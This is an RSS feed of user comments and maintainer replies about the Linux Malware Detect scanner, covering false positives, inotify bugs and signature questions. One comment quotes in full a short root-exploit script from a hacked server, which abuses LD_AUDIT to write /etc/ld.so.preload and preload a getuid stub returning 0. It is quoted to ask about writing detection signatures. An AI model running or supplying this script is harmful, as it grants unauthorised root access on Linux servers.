<?xml version="1.0" encoding="UTF-8"?><rss version="2.0"
	xmlns:content="http://purl.org/rss/1.0/modules/content/"
	xmlns:dc="http://purl.org/dc/elements/1.1/"
	xmlns:atom="http://www.w3.org/2005/Atom"
	xmlns:sy="http://purl.org/rss/1.0/modules/syndication/"
		>
<channel>
	<title>Comments on: Linux Malware Detect</title>
	<atom:link href="http://www.rfxn.com/projects/linux-malware-detect/feed/" rel="self" type="application/rss+xml" />
	<link>http://www.rfxn.com</link>
	<description> Linux Software &#38; Blog</description>
	<lastBuildDate>Thu, 26 Jan 2012 07:01:13 +0000</lastBuildDate>
	<sy:updatePeriod>hourly</sy:updatePeriod>
	<sy:updateFrequency>1</sy:updateFrequency>
	<generator>http://wordpress.org/?v=3.3.1</generator>
	<item>
		<title>By: Ryan M.</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-23076</link>
		<dc:creator>Ryan M.</dc:creator>
		<pubDate>Thu, 26 Jan 2012 07:01:13 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-23076</guid>
		<description>LMD provides a number of facilities for ignoring false positives including an ignore_paths file which a full path to the false positive file can be placed in or an ignore_sigs file where problematic signatures can be ignored entirely. I would recommend you advise your host to place the full path to your file into /usr/local/maldetect/ignore_paths and it should take care of the issue.  What host are you using if I may ask?</description>
		<content:encoded><![CDATA[<p>LMD provides a number of facilities for ignoring false positives including an ignore_paths file which a full path to the false positive file can be placed in or an ignore_sigs file where problematic signatures can be ignored entirely. I would recommend you advise your host to place the full path to your file into /usr/local/maldetect/ignore_paths and it should take care of the issue.  What host are you using if I may ask?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: John</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-23072</link>
		<dc:creator>John</dc:creator>
		<pubDate>Thu, 26 Jan 2012 05:27:26 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-23072</guid>
		<description>Need Help Please - Web hosting account suspended due to false positives from seo.classes.php

I believe my web host supplier is runing your program and after loading up an oscommerce addon to my site my hosting account is automatically suspended due to a false positive from the seo.classes.php file?

I&#039;ve taken it up with the host two days in a row now but they run a low cost model and aren&#039;t big on customer service that requires any manual adjustments. I appreciate the fact that they probably have thousands of clients on their servers, but surely there is a way they can easily allow this file to not be automatically quarantined and the account suspended.  It doesn&#039;t help my online rep.

I would also suggest that the &quot;Account Suspended&quot; text be changed to something like &quot;Site Offline&quot;.  They are both technically correct but the latter is substantially less damaging.

Any advice would be appreciated!</description>
		<content:encoded><![CDATA[<p>Need Help Please &#8211; Web hosting account suspended due to false positives from seo.classes.php</p>
<p>I believe my web host supplier is runing your program and after loading up an oscommerce addon to my site my hosting account is automatically suspended due to a false positive from the seo.classes.php file?</p>
<p>I&#8217;ve taken it up with the host two days in a row now but they run a low cost model and aren&#8217;t big on customer service that requires any manual adjustments. I appreciate the fact that they probably have thousands of clients on their servers, but surely there is a way they can easily allow this file to not be automatically quarantined and the account suspended.  It doesn&#8217;t help my online rep.</p>
<p>I would also suggest that the &#8220;Account Suspended&#8221; text be changed to something like &#8220;Site Offline&#8221;.  They are both technically correct but the latter is substantially less damaging.</p>
<p>Any advice would be appreciated!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ryan M.</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-22664</link>
		<dc:creator>Ryan M.</dc:creator>
		<pubDate>Wed, 18 Jan 2012 16:02:45 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-22664</guid>
		<description>I apologize, rfxn.com was recently moved to a new server and is currently undergoing a backend change to enable a CDN network, as such malware checkouts are temporarily disabled. You may tar or zip up the threat and email it to malware@rfxn.com.</description>
		<content:encoded><![CDATA[<p>I apologize, rfxn.com was recently moved to a new server and is currently undergoing a backend change to enable a CDN network, as such malware checkouts are temporarily disabled. You may tar or zip up the threat and email it to <a href="mailto:malware@rfxn.com">malware@rfxn.com</a>.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Eyal</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-22663</link>
		<dc:creator>Eyal</dc:creator>
		<pubDate>Wed, 18 Jan 2012 15:52:11 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-22663</guid>
		<description>Thanks for this excellent product!

I found a threat that wasn&#039;t detected by maldet.
I tried to upload it with the -c option but I get:

550 Can&#039;t change directory to incoming: Permission denied

Any ideas?
Thanks!</description>
		<content:encoded><![CDATA[<p>Thanks for this excellent product!</p>
<p>I found a threat that wasn&#8217;t detected by maldet.<br />
I tried to upload it with the -c option but I get:</p>
<p>550 Can&#8217;t change directory to incoming: Permission denied</p>
<p>Any ideas?<br />
Thanks!</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Christian</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-22646</link>
		<dc:creator>Christian</dc:creator>
		<pubDate>Wed, 18 Jan 2012 06:37:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-22646</guid>
		<description>Hi Ryan,

thanks for working hard on the script :)


I&#039;m on Debian Squeeze (64bit) and am still encountering the same problem as the poster of comment #106, maldet reports that says that there are no inotify processes found.

{mon} no inotify process found, check /usr/local/maldetect/inotify/inotify_log for errors.

The log stays empty and when i manually execute inotifywatch without arguments it seems to run and complains that there are no files specified to watch.

I&#039;ve manually modified maldet to not grep for /home in /etc/passwd but for /var/www (which is my home dir for webhosting users) and it did detect and set inotify to a more reasonable value (instead of 0), however it still reports there are no inotify processes found.

Do you have an idea on how to fix that?</description>
		<content:encoded><![CDATA[<p>Hi Ryan,</p>
<p>thanks for working hard on the script <img src='http://www.rfxn.com/wp-includes/images/smilies/icon_smile.gif' alt=':)' class='wp-smiley' /> </p>
<p>I&#8217;m on Debian Squeeze (64bit) and am still encountering the same problem as the poster of comment #106, maldet reports that says that there are no inotify processes found.</p>
<p>{mon} no inotify process found, check /usr/local/maldetect/inotify/inotify_log for errors.</p>
<p>The log stays empty and when i manually execute inotifywatch without arguments it seems to run and complains that there are no files specified to watch.</p>
<p>I&#8217;ve manually modified maldet to not grep for /home in /etc/passwd but for /var/www (which is my home dir for webhosting users) and it did detect and set inotify to a more reasonable value (instead of 0), however it still reports there are no inotify processes found.</p>
<p>Do you have an idea on how to fix that?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Will Sinclair</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-22098</link>
		<dc:creator>Will Sinclair</dc:creator>
		<pubDate>Tue, 10 Jan 2012 16:43:20 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-22098</guid>
		<description>Just wanted to say thanks. My server was hacked a couple of days ago, and I knew something was up... then I got the bandwidth bill: £180!!! Your program pinpointed exactly what was up and quarantined it.</description>
		<content:encoded><![CDATA[<p>Just wanted to say thanks. My server was hacked a couple of days ago, and I knew something was up&#8230; then I got the bandwidth bill: £180!!! Your program pinpointed exactly what was up and quarantined it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ryan M.</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-21976</link>
		<dc:creator>Ryan M.</dc:creator>
		<pubDate>Mon, 09 Jan 2012 10:54:15 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-21976</guid>
		<description>Is this still an issue you are seeing?</description>
		<content:encoded><![CDATA[<p>Is this still an issue you are seeing?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ryan M.</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-21975</link>
		<dc:creator>Ryan M.</dc:creator>
		<pubDate>Mon, 09 Jan 2012 10:53:52 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-21975</guid>
		<description>The tlog issue has been fixed and pushed live, sorry for the oversight. 

As for the inotify binaries, in 1.4.2 I will add x64 binaries along with a simple check to determine system arch and use the appropriate binaries. I will also add a check to see if the system has its own copy of inotifywatch in $PATH and if so use it.</description>
		<content:encoded><![CDATA[<p>The tlog issue has been fixed and pushed live, sorry for the oversight. </p>
<p>As for the inotify binaries, in 1.4.2 I will add x64 binaries along with a simple check to determine system arch and use the appropriate binaries. I will also add a check to see if the system has its own copy of inotifywatch in $PATH and if so use it.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Peter M. Abraham</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-19785</link>
		<dc:creator>Peter M. Abraham</dc:creator>
		<pubDate>Tue, 13 Dec 2011 15:54:29 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-19785</guid>
		<description>Good day, Ryan:

I hope you and your family are doing well.

We&#039;ve received two separate reports from two different servers showing:

FILE HIT LIST:
{HEX}php.exe.globals.383 : [full path to a directory]

Where it shows scores of directories, but no individual files.

Should I be concerned?

How would I further diagnose this issue?

Thank you.</description>
		<content:encoded><![CDATA[<p>Good day, Ryan:</p>
<p>I hope you and your family are doing well.</p>
<p>We&#8217;ve received two separate reports from two different servers showing:</p>
<p>FILE HIT LIST:<br />
{HEX}php.exe.globals.383 : [full path to a directory]</p>
<p>Where it shows scores of directories, but no individual files.</p>
<p>Should I be concerned?</p>
<p>How would I further diagnose this issue?</p>
<p>Thank you.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Brad Coudriet</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-19175</link>
		<dc:creator>Brad Coudriet</dc:creator>
		<pubDate>Thu, 01 Dec 2011 15:51:10 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-19175</guid>
		<description>First off, great tool!!

Here&#039;s my uname -a

Linux xxxxxxxx 2.6.32-32-server #62-Ubuntu SMP Wed Apr 20 22:07:43 UTC 2011 x86_64 GNU/Linux

Couple of bugs I found.

1. tlog doesn&#039;t like /bin/sh under Ubuntu 10.04, changing to /bin/bash seems to fix that.
2. Including and using 32bit bins for inotifywatch and its library really doesn&#039;t help those of us using x64 :(

Any change in an updated version including some logic to use the system version of inotifywatch?</description>
		<content:encoded><![CDATA[<p>First off, great tool!!</p>
<p>Here&#8217;s my uname -a</p>
<p>Linux xxxxxxxx 2.6.32-32-server #62-Ubuntu SMP Wed Apr 20 22:07:43 UTC 2011 x86_64 GNU/Linux</p>
<p>Couple of bugs I found.</p>
<p>1. tlog doesn&#8217;t like /bin/sh under Ubuntu 10.04, changing to /bin/bash seems to fix that.<br />
2. Including and using 32bit bins for inotifywatch and its library really doesn&#8217;t help those of us using x64 <img src='http://www.rfxn.com/wp-includes/images/smilies/icon_sad.gif' alt=':(' class='wp-smiley' /> </p>
<p>Any change in an updated version including some logic to use the system version of inotifywatch?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: ethan</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-18848</link>
		<dc:creator>ethan</dc:creator>
		<pubDate>Fri, 25 Nov 2011 00:18:29 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-18848</guid>
		<description>Hi,  thanks for this LIFESAVING application! Your excellent work is amazing and so useful to thousands of people, and I truly appreciate it.

I was just wondering... I dont see options for quiet/verbose. I think this generally standard unix feature would be quite helpful...

For example, I have a nightly cron with email report, something like this:

maldet -d
maldet -u
maldet -r ...

and the email is so long with unnecessary info.

I wish there was a way to just have it report the minimal info, without the repeated headers and emails... 
something like: maldet -d --quiet  
or --noheader

What do you think?</description>
		<content:encoded><![CDATA[<p>Hi,  thanks for this LIFESAVING application! Your excellent work is amazing and so useful to thousands of people, and I truly appreciate it.</p>
<p>I was just wondering&#8230; I dont see options for quiet/verbose. I think this generally standard unix feature would be quite helpful&#8230;</p>
<p>For example, I have a nightly cron with email report, something like this:</p>
<p>maldet -d<br />
maldet -u<br />
maldet -r &#8230;</p>
<p>and the email is so long with unnecessary info.</p>
<p>I wish there was a way to just have it report the minimal info, without the repeated headers and emails&#8230;<br />
something like: maldet -d &#8211;quiet<br />
or &#8211;noheader</p>
<p>What do you think?</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Ryan M.</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-18484</link>
		<dc:creator>Ryan M.</dc:creator>
		<pubDate>Sun, 20 Nov 2011 22:14:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-18484</guid>
		<description>Yes, all subdirectories will be monitored and any subsequent paths created after initialization will also get picked up.</description>
		<content:encoded><![CDATA[<p>Yes, all subdirectories will be monitored and any subsequent paths created after initialization will also get picked up.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Peter M. Abraham</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-18458</link>
		<dc:creator>Peter M. Abraham</dc:creator>
		<pubDate>Sun, 20 Nov 2011 15:23:47 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-18458</guid>
		<description>Good day, Ryan:

When you set maldet to monitor user&#039;s, does it monitor sub directories under the user home directory?

Thank you.</description>
		<content:encoded><![CDATA[<p>Good day, Ryan:</p>
<p>When you set maldet to monitor user&#8217;s, does it monitor sub directories under the user home directory?</p>
<p>Thank you.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: Web Dizajn</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-17821</link>
		<dc:creator>Web Dizajn</dc:creator>
		<pubDate>Sun, 13 Nov 2011 12:16:07 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-17821</guid>
		<description>Installed this anti-malware, and I&#039;m happy effect. However, it is difficult to cope with the recent malware injection generating htaccess files. I hope that this will be improved.</description>
		<content:encoded><![CDATA[<p>Installed this anti-malware, and I&#8217;m happy effect. However, it is difficult to cope with the recent malware injection generating htaccess files. I hope that this will be improved.</p>
]]></content:encoded>
	</item>
	<item>
		<title>By: lars</title>
		<link>http://www.rfxn.com/projects/linux-malware-detect/#comment-16680</link>
		<dc:creator>lars</dc:creator>
		<pubDate>Wed, 02 Nov 2011 12:52:30 +0000</pubDate>
		<guid isPermaLink="false">http://www.rfxn.com/?page_id=372#comment-16680</guid>
		<description>hello, nice tool and great work. is there a way to build own hashes, for example i need to find files with binaries or bashes:

the last server ist hacked by an unsecure apache with root kit spl.sh :

#!/bin/sh
umask 0
LD_AUDIT=libpcprofile.so PCPROFILE_OUTPUT=/etc/ld.so.preload ping
echo &quot;[+] creating /tmp/getuid.so&quot;
echo &quot;int getuid(){return 0;}&quot; &gt; /tmp/getuid.c
gcc -shared /tmp/getuid.c -o /tmp/getuid.so
echo &quot;/tmp/getuid.so&quot; &gt; /etc/ld.so.preload

So i want to build an hash to parse all files with #!/bin/ or for binaries:

file /bin/bash -&gt; search/scan for  ELF \d\d-bit 

So which files i have to touch for own hashes ?

hex.dat
md5.dat
rfxn.hdb
rfxn.ndb

so for example want to find files with &quot;#!/bin&quot;

what  i have to do ?

md5(#!/bin) -&gt; touch  md5.dat and/or rfxn.db -&gt;

0b4962363758288f8f7e0d9cdb413d92:88:{MD5}bash.inject.unclassed.1

0b4962363758288f8f7e0d9cdb413d92:{MD5}bash.inject.unclassed.1

do we need both hex and md5 for this ? thanks for any help with own definitions cause i think not everyone wants to parse #!/bin</description>
		<content:encoded><![CDATA[<p>hello, nice tool and great work. is there a way to build own hashes, for example i need to find files with binaries or bashes:</p>
<p>the last server ist hacked by an unsecure apache with root kit spl.sh :</p>
<p>#!/bin/sh<br />
umask 0<br />
LD_AUDIT=libpcprofile.so PCPROFILE_OUTPUT=/etc/ld.so.preload ping<br />
echo &#8220;[+] creating /tmp/getuid.so&#8221;<br />
echo &#8220;int getuid(){return 0;}&#8221; &gt; /tmp/getuid.c<br />
gcc -shared /tmp/getuid.c -o /tmp/getuid.so<br />
echo &#8220;/tmp/getuid.so&#8221; &gt; /etc/ld.so.preload</p>
<p>So i want to build an hash to parse all files with #!/bin/ or for binaries:</p>
<p>file /bin/bash -&gt; search/scan for  ELF \d\d-bit </p>
<p>So which files i have to touch for own hashes ?</p>
<p>hex.dat<br />
md5.dat<br />
rfxn.hdb<br />
rfxn.ndb</p>
<p>so for example want to find files with &#8220;#!/bin&#8221;</p>
<p>what  i have to do ?</p>
<p>md5(#!/bin) -&gt; touch  md5.dat and/or rfxn.db -&gt;</p>
<p>0b4962363758288f8f7e0d9cdb413d92:88:{MD5}bash.inject.unclassed.1</p>
<p>0b4962363758288f8f7e0d9cdb413d92:{MD5}bash.inject.unclassed.1</p>
<p>do we need both hex and md5 for this ? thanks for any help with own definitions cause i think not everyone wants to parse #!/bin</p>
]]></content:encoded>
	</item>
</channel>
</rss>

